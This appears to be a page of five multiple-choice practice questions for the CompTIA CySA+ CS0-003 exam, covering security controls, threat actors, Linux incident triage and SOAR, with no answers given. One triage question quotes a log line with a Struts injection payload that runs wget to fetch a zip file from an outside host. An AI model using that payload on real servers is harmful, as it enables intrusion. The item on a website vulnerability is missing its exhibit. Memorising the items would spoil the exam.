Official Bank 0/462

CompTIA CySA+ exam (CS0-003) - CompTIA Exam Questions

Last updated on June 20, 2026

97% Exam Compliance
462 Total Questions
1
Question
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
Options
A Implement step-up authentication for administrators
B Increase password complexity standards
C Improve employee training and awareness
D Deploy mobile device management
Discussion (0 comments)

to join the discussion

Community Discussion

No discussions yet. Be the first to ask!

2
Question
A security analyst found the following vulnerability on the company’s website:

Which of the following should be implemented to prevent this type of attack in the future?
Options
A Input sanitization
B Prepared statements
C Output encoding
D Code obfuscation
Discussion (0 comments)

to join the discussion

Community Discussion

No discussions yet. Be the first to ask!

3
Question
A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become?
Options
A Hacklivist
B Insider threat
C Script kiddie
D Advanced persistent threat
Discussion (0 comments)

to join the discussion

Community Discussion

No discussions yet. Be the first to ask!

4
Question
An incident response team member is triaging a Linux server. The output is shown below:
$ cat /etc/passwd
root:x:0:0::/:/bin/zsh bin:x:1:1::/:/usr/bin/nologin daemon:x:2:2::/:/usr/bin/nologin mail:x:8:12::/var/spool/mail:/usr/bin/nologin http:x:33:33::/srv/http:/bin/bash nobody:x:65534:65534:Nobody:/:/usr/bin/nologin
git:x:972:972:git daemon user:/:/usr/bin/git-shell
$ cat /var/log/httpd
at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241) at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316) at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUpl oadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334) at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartReq uest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartReq uest.java:423)

Which of the following is the adversary most likely trying to do?
Options
A Create a backdoor root account named zsh.
B Perform a denial-of-service attack on the web server.
C Send a beacon to a command-and-control server.
D Execute commands through an unsecured service account.
Discussion (0 comments)

to join the discussion

Community Discussion

No discussions yet. Be the first to ask!

5
Question
Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).
Select 2
Options
A Define a security strategy
B Minimize security attacks
C Reduce repetitive tasks
D Itemize tasks for approval
E Generate reports and metrics
F Minimize setup complexity
Discussion (0 comments)

to join the discussion

Community Discussion

No discussions yet. Be the first to ask!

Finish Practice?

Are you sure you want to finish? This will end your practice session.